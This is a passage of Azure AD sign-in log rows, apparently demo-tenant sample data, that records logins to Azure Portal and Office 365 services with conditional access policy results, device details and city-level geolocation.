'235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",0d3dadc7-5b90-4194-87e2-04e0fbf00900,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,0d3dadc7-5b90-4194-87e2-04e0fbf00900,SigninLogs,Sucess,50.6406517,5.572050095
+1302,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:48.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8866f5c2-c0ad-410f-ba98-c2ca8978fa11,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",fbcf3a57-b92a-4bcf-a38d-09fb66d00b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,fbcf3a57-b92a-4bcf-a38d-09fb66d00b00,SigninLogs,Sucess,50.6406517,5.572050095
+1303,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,11:38.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cfcf3990-7152-4749-81ff-b96f50d59f00,Microsoft.aadiam,Microsoft.aadiam,,Sentinel Partner Account 6,4,IN,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:11,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",cbcd7f19-25f4-4cfd-824c-94dcce290a00,,,"{'countryOrRegion': 'IN', 'geoCoordinates': {'longitude': 72.87770080566406, 'latitude': 19.076000213623047}, 'state': 'Maharashtra', 'city': 'Mumbai'}",none,none,none,none,[],{'errorCode': 0},Sentinel Partner Account 6,dd7e1752-57a8-4e72-8589-6a68e4a1f500,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,cbcd7f19-25f4-4cfd-824c-94dcce290a00,SigninLogs,Sucess,19.07600021,72.87770081
+1304,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:04.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,21d0ec9d-f4d9-40b2-b620-58cb9a4eff32,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:35,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",d0efda67-c5f0-466a-9417-d05e09ad0b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,d0efda67-c5f0-466a-9417-d05e09ad0b00,SigninLogs,Sucess,50.6406517,5.572050095
+1305,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:41.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",b125da47-83a8-4791-90e4-983ba03a0a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,b125da47-83a8-4791-90e4-983ba03a0a00,SigninLogs,Sucess,50.6406517,5.572050095
+1306,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:57.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3f7752c8-1391-44f5-b7ae-b418263eecdc,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",22fd8c7c-75eb-4549-80fa-1727ac530c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,22fd8c7c-75eb-4549-80fa-1727ac530c00,SigninLogs,Sucess,50.6406517,5.572050095
+1307,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:47.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",4f5563e9-cd91-4aaf-8dc5-b5ee9f960d00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4f5563e9-cd91-4aaf-8dc5-b5ee9f960d00,SigninLogs,Sucess,33.0175209,35.44601059
+1308,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:23.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7310f976-b66c-44b4-9c11-e3ef73e2a492,Microsoft.aadiam,Microsoft.aadiam,,Nicholas DiCola (SECURITY JEDI),4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:20,"{'operatingSystem': 'Windows 10', 'deviceId': '51dc4855-d402-41ae-85fc-32714f2b813b', 'browser': 'Edge 81.0.416', 'displayName': 'ndicola-sl3', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",75fdb973-83ee-43aa-a5ac-5241328c3a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},Nicholas DiCola (SECURITY JEDI),142512c7-f006-46ae-909c-14fa7bf6a887,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,75fdb973-83ee-43aa-a5ac-5241328c3a00,SigninLogs,Sucess,38.47222137,-77.41989899
